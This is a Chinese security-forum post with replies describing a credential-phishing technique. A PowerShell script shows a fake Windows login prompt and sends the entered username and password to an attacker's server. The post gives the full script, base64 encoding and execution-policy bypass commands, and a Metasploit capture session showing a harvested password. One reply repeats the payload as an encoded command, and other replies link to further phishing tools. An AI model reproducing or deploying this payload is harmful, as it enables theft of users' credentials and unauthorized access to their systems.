当前位置:WooYun(白帽子技术社区) >> 我们都是猥琐流 >> Powershell Popups + Capture

Powershell Popups + Capture

五道口杀气 | 2015-01-13 18:17

from:http://www.room362.com/blog/2015/01/12/powershell-popups-plus-capture/

这个方法优势就是可以不产生任何文件,可以获取任何权限用户的认证信息

不需要管理员权限,不需要绕过UAC。

原理就是利用powershell脚本制造一个假的登陆界面,管理员登陆之后会把密码发送到我们的服务器上。
这里接收密码是使用的metasploit。

powershell脚本:

$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName + "\" + [Environment]::UserName,[Environment]::UserDomainName);[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};
$wc = new-object net.webclient;
$wc.Headers.Add("User-Agent","Wget/1.9+cvs-stable (Red Hat modified)");
$wc.Proxy = [System.Net.WebRequest]::DefaultWebProxy;
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;
$wc.credentials = new-object system.net.networkcredential($cred.username, $cred.getnetworkcredential().password, '');
$result = $wc.downloadstring('https://172.16.102.163');

172.16.102.163为我们接受的地址。

cat power.txt | iconv --to-code UTF-16LE | base64

把代码生成base64.

然后执行

powershell -ep bypass -enc <base64编码的代码>

2014-09-03-powershellpopup.png

metasploit接收密码:

root@wpad:~/metasploit-framework# ./msfconsole -Lq
msf > use auxiliary/server/capture/http_basic
msf auxiliary(http_basic) > show options

Module options (auxiliary/server/capture/http_basic):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   REALM        Secure Site      yes       The authentication realm you'd like to present.
   RedirectURL                   no        The page to redirect users to after they enter basic auth creds
   SRVHOST      0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT      80               yes       The local port to listen on.
   SSL          false            no        Negotiate SSL for incoming connections
   SSLCert                       no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion   SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                       no        The URI to use for this exploit (default is random)

msf auxiliary(http_basic) > set SSL true
SSL => true
msf auxiliary(http_basic) > set SRVPORT 443
SRVPORT => 443
msf auxiliary(http_basic) > set URIPATH /
URIPATH => /
msf auxiliary(http_basic) > run
[*] Auxiliary module execution completed
msf auxiliary(http_basic) >
[*] Listening on 0.0.0.0:443...
[*] Using URL: https://0.0.0.0:443/
[*]  Local IP: https://172.16.102.163:443/
[*] Server started.
[*] 172.16.102.140   http_basic - Sending 401 to client 172.16.102.140
[+] 172.16.102.140 - Credential collected: "SITTINGDUCK\user:ASDqwe123" => /

分享到:
19 个回复
  1. 1#
    回复此人 感谢
    YY-2012 (#)<alert("dandan")>(#) | 2015-01-13 18:26

    so 吊

  2. 2#
    回复此人 感谢
    Kavia (求工作求收留) | 2015-01-13 18:40

    mark

  3. 3#
    回复此人 感谢
    Chu (学习ing。) | 2015-01-13 18:42

    在hak5 上看到了,感觉挺棒的

  4. 4#
    回复此人 感谢
    xsser (十根阳具有长短!!) | 2015-01-13 18:42

    这玩意太牛了

  5. 5#
    回复此人 感谢
    insight-labs (Root Yourself in Success) | 2015-01-13 19:05

    猥琐淫荡……

  6. 6#
    回复此人 感谢
    RainShine (I'm your angel of music.) | 2015-01-13 19:52

    so diao...

  7. 7# 感谢(1)
    回复此人 感谢
    Jeremy | 2015-01-13 19:57

    《论ctrl+alt+del的重要性》

  8. 8#
    回复此人 感谢
    ACGT | 2015-01-13 20:49

    懒得自己写的话,对付xp可以用这个
    http://exploit.co.il/hacking/windows-domain-credentials-phishing-tool/

  9. 9#
    回复此人 感谢
    Anymous (ด้้้้้็็็็็้้้้้็็็็็้้้ด้้้้้็็็็็้้้้้็็็็็้้้ด้้้้้็็็็็้้้้้็็็็็้้้ด้้้้้็็็็็้้้้้็็็็็้้้ด้้้้้็็็็็้้้้้็็็็็้้้ด้้้้้็็็็็้้้้้็็็็็้้้ด้้้้้็็็็็้้้้้็็็็็้้้) | 2015-01-13 21:01

    powershell的,可以放到HID键盘攻击
    http://zone.wooyun.org/content/17931
    找人插一下它

  10. 10#
    回复此人 感谢
    Anymous (ด้้้้้็็็็็้้้้้็็็็็้้้ด้้้้้็็็็็้้้้้็็็็็้้้ด้้้้้็็็็็้้้้้็็็็็้้้ด้้้้้็็็็็้้้้้็็็็็้้้ด้้้้้็็็็็้้้้้็็็็็้้้ด้้้้้็็็็็้้้้้็็็็็้้้ด้้้้้็็็็็้้้้้็็็็็้้้) | 2015-01-13 21:02

    好像有点鸡肋

  11. 11#
    回复此人 感谢
    %230CC (Who's Your Daddy ---lordi) | 2015-01-14 11:28

    在详细讲一下 怎么把MSF接进去吧。。。

  12. 12#
    回复此人 感谢
    _Evil (科普是一种公益行为) | 2015-01-14 14:16

    好玩的东西

  13. 13#
    回复此人 感谢
    冷冷的夜 (1) | 2015-01-14 16:02

    room362 必须是干货啊,就是更新频率太慢了

  14. 14#
    回复此人 感谢
    Ano_Tom | 2015-01-14 16:17

    666

  15. 15#
    回复此人 感谢
    疯狗 (阅尽天下漏洞,心中自然无码。) | 2015-01-14 16:33

    powershell太强了,这思路太牛了啊。。。cmd哭晕在厕所

  16. 16#
    回复此人 感谢
    指尖的温度 | 2015-01-17 16:21

    叼,666666666666

  17. 17#
    回复此人 感谢
    [email protected] (谁他妈手贱改我签名) | 2015-01-19 18:06

    应用场景呢?

  18. 18#
    回复此人 感谢
    [email protected] (谁他妈手贱改我签名) | 2015-01-19 18:07

    能讲讲大家会在什么情况下基于什么样的权限及环境用这个么?

  19. 19#
    回复此人 感谢
    悠悠 (悠悠) | 2015-01-21 09:27

    @五道口杀气

    话说,执行
    powershell -ep bypass -enc JGNyZWQgPSAkaG9zdC51aS5wcm9tcHRmb3JjcmVkZW50aWFsKCdGYWlsZWQgQXV0aGVudGljYXRpb24nLCcnLFtFbnZpcm9ubWVudF06OlVzZXJEb21haW5OYW1lICsgIlwiICsgW0Vudmlyb25tZW50XTo6VXNlck5hbWUsW0Vudmlyb25tZW50XTo6VXNlckRvbWFpbk5hbWUpO1tTeXN0ZW0uTmV0LlNlcnZpY2VQb2ludE1hbmFnZXJdOjpTZXJ2ZXJDZXJ0aWZpY2F0ZVZhbGlkYXRpb25DYWxsYmFjayA9IHskdHJ1ZX07IAokd2MgPSBuZXctb2JqZWN0IG5ldC53ZWJjbGllbnQ7IAokd2MuSGVhZGVycy5BZGQoIlVzZXItQWdlbnQiLCJXZ2V0LzEuOStjdnMtc3RhYmxlIChSZWQgSGF0IG1vZGlmaWVkKSIpOyAKJHdjLlByb3h5ID0gW1N5c3RlbS5OZXQuV2ViUmVxdWVzdF06OkRlZmF1bHRXZWJQcm94eTsgCiR3Yy5Qcm94eS5DcmVkZW50aWFscyA9IFtTeXN0ZW0uTmV0LkNyZWRlbnRpYWxDYWNoZV06OkRlZmF1bHROZXR3b3JrQ3JlZGVudGlhbHM7IAokd2MuY3JlZGVudGlhbHMgPSBuZXctb2JqZWN0IHN5c3RlbS5uZXQubmV0d29ya2NyZWRlbnRpYWwoJGNyZWQudXNlcm5hbWUsICRjcmVkLmdldG5ldHdvcmtjcmVkZW50aWFsKCkucGFzc3dvcmQsICcnKTsgCiRjcmVkLnVzZXJuYW1lIHwgb3V0LWZpbGUgLWZpbGVwYXRoICJDOlxVc2Vyc1xBZG1pbmlzdHJhdG9yXERlc2t0b3BccG93ZXJzaGVsbFxhYWEudHh0IgokY3JlZC5nZXRuZXR3b3JrY3JlZGVudGlhbCgpLnBhc3N3b3JkIHwgb3V0LWZpbGUgLWZpbGVwYXRoICJDOlxVc2Vyc1xBZG1pbmlzdHJhdG9yXERlc2t0b3BccG93ZXJzaGVsbFxhYWEudHh0IgokcmVzdWx0ID0gJHdjLmRvd25sb2Fkc3RyaW5nKCdodHRwczovLzE3Mi4xNi4xMDIuMTYzJyk7

    报告错误
    ===
    无法将“挤敲⁤‽栤獯⹴極瀮潲灭晴牯牣摥湥楴污✨慆汩摥䄠瑵敨瑮捩瑡潩❮✬Ⱗ䕛癮物湯敭瑮㩝
    唺敳䑲浯楡乮浡⁥‫尢•‫䕛癮物湯敭瑮㩝唺敳乲浡ⱥ䕛癮物湯敭瑮㩝唺敳䑲浯楡乮浡⥥嬻祓瑳
    浥丮瑥匮牥楶散潐湩䵴湡条牥㩝区牥敶䍲牥楴楦慣整慖楬慤楴湯慃汬慢正㴠笠琤畲絥※␊捷
    㴠渠睥漭橢捥⁴敮⹴敷换楬湥㭴ਠ眤⹣效摡牥⹳摁⡤唢敳⵲杁湥≴∬杗瑥ㄯ㤮挫獶猭慴汢⁥刨摥䠠瑡洠
    摯晩敩⥤⤢※␊捷倮潲祸㴠嬠祓瑳浥丮瑥圮扥敒畱獥嵴㨺敄慦汵坴扥牐硯㭹ਠ眤⹣牐硯⹹牃摥湥
    楴污⁳‽卛獹整⹭敎⹴牃摥湥楴污慃档嵥㨺敄慦汵乴瑥潷歲牃摥湥楴污㭳ਠ眤⹣牣摥湥楴污⁳‽敮⵷
    扯敪瑣猠獹整⹭敮⹴敮睴牯捫敲敤瑮慩⡬挤敲⹤獵牥慮敭‬挤敲⹤敧湴瑥潷歲牣摥湥楴污⤨瀮獡睳
    牯Ɽ✠⤧※␊牣摥甮敳湲浡⁥⁼畯⵴楦敬ⴠ楦敬慰桴∠㩃啜敳獲䅜浤湩獩牴瑡牯䑜獥瑫灯灜睯牥桳
    汥屬慡⹡硴≴␊牣摥朮瑥敮睴牯捫敲敤瑮慩⡬⸩慰獳潷摲簠漠瑵昭汩⁥昭汩灥瑡⁨䌢尺獕牥屳摁業
    楮瑳慲潴屲敄歳潴屰潰敷獲敨汬慜慡琮瑸ਢ爤獥汵⁴‽眤⹣潤湷潬摡瑳楲杮✨瑨灴㩳⼯㜱⸲㘱ㄮ㈰ㄮ㌶
    ⤧�”项识别为 cmdlet、函数、脚本文件或可运行程序的名称。请检查名称的拼写,如果包
    括路径,请确保路径正确,然后重试。
    所在位置 行:1 字符: 429
    ======
    啥情况,这是?

    如果使用powershell直接运行ps1脚本,则需要uac权限去开启执行权限,囧~

  20. 20#
    回复此人 感谢
    三好学生 (:) | 2015-08-25 08:19

    @悠悠 编码问题,utf需要转成unicode

添加新回复

登录 后才能参与评论.

WooYun(白帽子技术社区)

网络安全资讯、讨论,跨站师,渗透师,结界师聚集之地

登录

其它内容


Copyright © 2010 www.wooyun.org All Rights Reserved. 吉ICP备12001400号-1